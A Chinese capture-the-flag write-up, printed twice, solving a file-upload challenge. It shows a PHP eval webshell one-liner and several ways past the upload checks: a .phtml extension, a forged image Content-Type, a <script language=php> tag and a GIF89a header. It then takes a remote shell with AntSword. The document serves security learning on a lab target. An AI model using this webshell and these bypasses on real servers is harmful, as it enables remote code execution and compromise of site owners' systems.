大家好你们可以叫我凌是个16岁的网络安全学习者。今天我们来刷的题目是 [极客大挑战 2019]Upload废话不多说我们直接开始吧解题思路我们先启动靶场进入靶场发现有个文件上传的功能初步判断存在文件上传漏洞。我们依旧不着急先右击查看源代码看看有没有其他什么线索。!DOCTYPE html html langzh style .button { background-color: #5DADE2; /* Green */ border: none; color: white; padding: 8px 20px; text-align: center; text-decoration: none; display: inline-block; font-size: 12px; margin: 4px 2px; cursor: pointer; -webkit-transition-duration: 0.4s; /* Safari */ transition-duration: 0.4s; border-radius: 8px; } .button:hover { background-color: #555555; color: white; } /style head meta charsetUTF-8 title上传头像/title link relstylesheet typetext/css hrefcss/reset.css link relstylesheet hrefcss/demo.css / link relstylesheet hrefdist/styles/Vidage.css / /head body div classVidage div classVidage__image/div video idVidageVideo classVidage__video preloadmetadata loop autoplay muted source srcvideos/bg.webm typevideo/webm source srcvideos/bg.mp4 typevideo/mp4 /video div classVidage__backdrop/div /div form actionupload_file.php methodpost enctypemultipart/form-data /br/br/br/br/br/br/br/br/br/br/br/br/br/br/br div aligncenter label forfile stylefont:20px Georgia,serif;图片/label input typefile namefile idfile input typesubmit namesubmit value提交 classbutton /div /form script srcdist/scripts/Vidage.min.js/script script new Vidage(#VidageVideo); /script div styleposition: absolute;bottom: 0;width: 95%;p aligncenter stylefont:italic 15px Georgia,serif; Syclover cl4y/p/div /body /html观察代码发现 input typefile namefile idfile 没有设置 accept 属性也未进行任何前端文件类型或大小校验。可能导致用户可以上传任意类型的文件。没有 JavaScript 对文件内容或后缀进行限制完全依赖后端处理。那么我们就上传个 一句话木马 尝试入侵。?php eval($_POST[cmd]); ?为以防万一我们先将后缀修改为 jpg再使用 Burp 进行截包重新改为 php。拦截到请求包了我们现在修改请求包看看效果Content-Disposition: form-data; namefile; filenamecmd.php Content-Type: image/jpeg发现被拦截了猜测后端有黑名单校验不能上传 php 文件。那我们就使用 php 的后缀变种来尝试进行上传。常见变种.php最标准的PHP文件后缀。.phtml常被用作PHP与HTML混合的模板文件。.php3, .php4, .php5为特定PHP版本设计的后缀一些旧服务器为兼容性会保留解析。.phps通常用于显示带语法高亮的PHP源码在某些配置下可能被当作普通PHP脚本执行。这里我们就直接采用 “phtml” 来测试依旧拦截的化就换成其他的依次尝试。这次显示不是图片那我们就拦截请求包将 Content-Type 修改为 image/jpeg 尝试突围。Content-Disposition: form-data; namefile; filenamecmd.phtml Content-Type: image/jpeg看来这次绕过成功了不过文件内容包含 “?” 被拦截了那我们就修改文件内容进行绕过。script languagephpeval($_POST[cmd]);/script这样子虽然是 HTML 的格式但是却是 PHP 代码现在继续尝试绕过。又被拦截了看来文件内容得像图片才可以。这时候我想起了当时我的老师说“图片文件都有个特点不同图片会以不同文件签名的方式来说明这是图片”。GIF 以 GIF87a 和 GIF89a 这些 ASCII 字符开头。JPEGFF D8 FF十六进制不以 ASCII 文本开头。PNG89 50 4E 47 0D 0A 1A 0A十六进制以非打印字符0x89开头后跟“PNG”。BMP42 4D十六进制- “BM”ASCII。WebP52 49 46 46“RIFF”后跟大小然后 57 45 42 50“WEBP”。那我们就在文件开头加上 GIF87a 来欺骗目标这是个 GIF 图片。GIF89a script languagephpeval($_POST[cmdl]);/script很好这样子我们就成功上传完成了多数上传的文件应该会有个 “upload” 文件夹来存放上传的文件那我们就尝试访问该文件看看。https://xxx/upload/cmd.phtml文件成功上传接下来使用蚁剑尝试进行连接成功进来了不过发现前人还有尝试使用文件名的 SQL注入 来突围。那我在这里说明下这种情况通常以上攻击是没有用的。对于文件名的SQL注入这里并没有拼接到数据库当中一般 文件名的SQL注入 出现在类似于“图书管理系统”这种需要存储文件名的地方而这里只是单纯的进行上传文件并没有线索。面对这种题目我只会在走投无路的情况下尝试这种方法。那么我们接下来就开始寻找 flag 了在根目录下发现疑似 flag 文件。直接访问成功拿下 flag。CTF2{f2e144e6-5f92-44a3-936a-c15ba0b9c317}靶场小结考点标签文件上传、前端绕过、后缀黑名单绕过、Content-Type绕过、文件内容过滤、图片马核心教训1. 前端无校验是第一步突破口input 没有 accept 属性也没有 JS 校验意味着任意文件类型都可以提交。这是文件上传漏洞的最初信号。2. 后缀黑名单绕过的经典套路.php 被拦就换 .phtml、.php3、.php5、.pht 等可执行后缀。3. Content-Type 只是摆设后端检查 Content-Type: image/jpeg 只是看了眼请求头抓包改成 image/jpeg 直接绕过。4. 文件内容过滤的应对——图片马当 ? 被拦截时用 script languagephp 同样可以执行 PHP 代码。如果还不够加上 GIF89a 文件头让后端以为是真正的 GIF 图片。图片马的原理就是利用文件头签名欺骗后端同时保留可执行的 PHP 代码。5. 上传后的文件路径推测多数上传功能会将文件放在 /upload/ 目录下文件名保持不变或可预测。用 AntSword 连接后在根目录下找 flag 文件是标准操作。解题关键步骤1. 信息收集查看前端源码确认无 accept 属性和 JS 校验。2. 上传木马测试上传 cmd.php被拦截确认后端有后缀黑名单。3. 后缀绕过换 cmd.phtml发现不是图片确认还有 MIME 检查。4. MIME 绕过抓包改 Content-Type: image/jpeg成功上传但被拦截 ?。5. 文件内容绕过用 script languagephp 替代 ?php又被拦。6. 图片马绕过文件头加 GIF89a成功上传 cmd.phtml。7. 连接与拿 FlagAntSword 连接 /upload/cmd.phtml在根目录找到 flag 文件直接读取。
[极客大挑战 2019]Upload 思路及解法
大家好你们可以叫我凌是个16岁的网络安全学习者。今天我们来刷的题目是 [极客大挑战 2019]Upload废话不多说我们直接开始吧解题思路我们先启动靶场进入靶场发现有个文件上传的功能初步判断存在文件上传漏洞。我们依旧不着急先右击查看源代码看看有没有其他什么线索。!DOCTYPE html html langzh style .button { background-color: #5DADE2; /* Green */ border: none; color: white; padding: 8px 20px; text-align: center; text-decoration: none; display: inline-block; font-size: 12px; margin: 4px 2px; cursor: pointer; -webkit-transition-duration: 0.4s; /* Safari */ transition-duration: 0.4s; border-radius: 8px; } .button:hover { background-color: #555555; color: white; } /style head meta charsetUTF-8 title上传头像/title link relstylesheet typetext/css hrefcss/reset.css link relstylesheet hrefcss/demo.css / link relstylesheet hrefdist/styles/Vidage.css / /head body div classVidage div classVidage__image/div video idVidageVideo classVidage__video preloadmetadata loop autoplay muted source srcvideos/bg.webm typevideo/webm source srcvideos/bg.mp4 typevideo/mp4 /video div classVidage__backdrop/div /div form actionupload_file.php methodpost enctypemultipart/form-data /br/br/br/br/br/br/br/br/br/br/br/br/br/br/br div aligncenter label forfile stylefont:20px Georgia,serif;图片/label input typefile namefile idfile input typesubmit namesubmit value提交 classbutton /div /form script srcdist/scripts/Vidage.min.js/script script new Vidage(#VidageVideo); /script div styleposition: absolute;bottom: 0;width: 95%;p aligncenter stylefont:italic 15px Georgia,serif; Syclover cl4y/p/div /body /html观察代码发现 input typefile namefile idfile 没有设置 accept 属性也未进行任何前端文件类型或大小校验。可能导致用户可以上传任意类型的文件。没有 JavaScript 对文件内容或后缀进行限制完全依赖后端处理。那么我们就上传个 一句话木马 尝试入侵。?php eval($_POST[cmd]); ?为以防万一我们先将后缀修改为 jpg再使用 Burp 进行截包重新改为 php。拦截到请求包了我们现在修改请求包看看效果Content-Disposition: form-data; namefile; filenamecmd.php Content-Type: image/jpeg发现被拦截了猜测后端有黑名单校验不能上传 php 文件。那我们就使用 php 的后缀变种来尝试进行上传。常见变种.php最标准的PHP文件后缀。.phtml常被用作PHP与HTML混合的模板文件。.php3, .php4, .php5为特定PHP版本设计的后缀一些旧服务器为兼容性会保留解析。.phps通常用于显示带语法高亮的PHP源码在某些配置下可能被当作普通PHP脚本执行。这里我们就直接采用 “phtml” 来测试依旧拦截的化就换成其他的依次尝试。这次显示不是图片那我们就拦截请求包将 Content-Type 修改为 image/jpeg 尝试突围。Content-Disposition: form-data; namefile; filenamecmd.phtml Content-Type: image/jpeg看来这次绕过成功了不过文件内容包含 “?” 被拦截了那我们就修改文件内容进行绕过。script languagephpeval($_POST[cmd]);/script这样子虽然是 HTML 的格式但是却是 PHP 代码现在继续尝试绕过。又被拦截了看来文件内容得像图片才可以。这时候我想起了当时我的老师说“图片文件都有个特点不同图片会以不同文件签名的方式来说明这是图片”。GIF 以 GIF87a 和 GIF89a 这些 ASCII 字符开头。JPEGFF D8 FF十六进制不以 ASCII 文本开头。PNG89 50 4E 47 0D 0A 1A 0A十六进制以非打印字符0x89开头后跟“PNG”。BMP42 4D十六进制- “BM”ASCII。WebP52 49 46 46“RIFF”后跟大小然后 57 45 42 50“WEBP”。那我们就在文件开头加上 GIF87a 来欺骗目标这是个 GIF 图片。GIF89a script languagephpeval($_POST[cmdl]);/script很好这样子我们就成功上传完成了多数上传的文件应该会有个 “upload” 文件夹来存放上传的文件那我们就尝试访问该文件看看。https://xxx/upload/cmd.phtml文件成功上传接下来使用蚁剑尝试进行连接成功进来了不过发现前人还有尝试使用文件名的 SQL注入 来突围。那我在这里说明下这种情况通常以上攻击是没有用的。对于文件名的SQL注入这里并没有拼接到数据库当中一般 文件名的SQL注入 出现在类似于“图书管理系统”这种需要存储文件名的地方而这里只是单纯的进行上传文件并没有线索。面对这种题目我只会在走投无路的情况下尝试这种方法。那么我们接下来就开始寻找 flag 了在根目录下发现疑似 flag 文件。直接访问成功拿下 flag。CTF2{f2e144e6-5f92-44a3-936a-c15ba0b9c317}靶场小结考点标签文件上传、前端绕过、后缀黑名单绕过、Content-Type绕过、文件内容过滤、图片马核心教训1. 前端无校验是第一步突破口input 没有 accept 属性也没有 JS 校验意味着任意文件类型都可以提交。这是文件上传漏洞的最初信号。2. 后缀黑名单绕过的经典套路.php 被拦就换 .phtml、.php3、.php5、.pht 等可执行后缀。3. Content-Type 只是摆设后端检查 Content-Type: image/jpeg 只是看了眼请求头抓包改成 image/jpeg 直接绕过。4. 文件内容过滤的应对——图片马当 ? 被拦截时用 script languagephp 同样可以执行 PHP 代码。如果还不够加上 GIF89a 文件头让后端以为是真正的 GIF 图片。图片马的原理就是利用文件头签名欺骗后端同时保留可执行的 PHP 代码。5. 上传后的文件路径推测多数上传功能会将文件放在 /upload/ 目录下文件名保持不变或可预测。用 AntSword 连接后在根目录下找 flag 文件是标准操作。解题关键步骤1. 信息收集查看前端源码确认无 accept 属性和 JS 校验。2. 上传木马测试上传 cmd.php被拦截确认后端有后缀黑名单。3. 后缀绕过换 cmd.phtml发现不是图片确认还有 MIME 检查。4. MIME 绕过抓包改 Content-Type: image/jpeg成功上传但被拦截 ?。5. 文件内容绕过用 script languagephp 替代 ?php又被拦。6. 图片马绕过文件头加 GIF89a成功上传 cmd.phtml。7. 连接与拿 FlagAntSword 连接 /upload/cmd.phtml在根目录找到 flag 文件直接读取。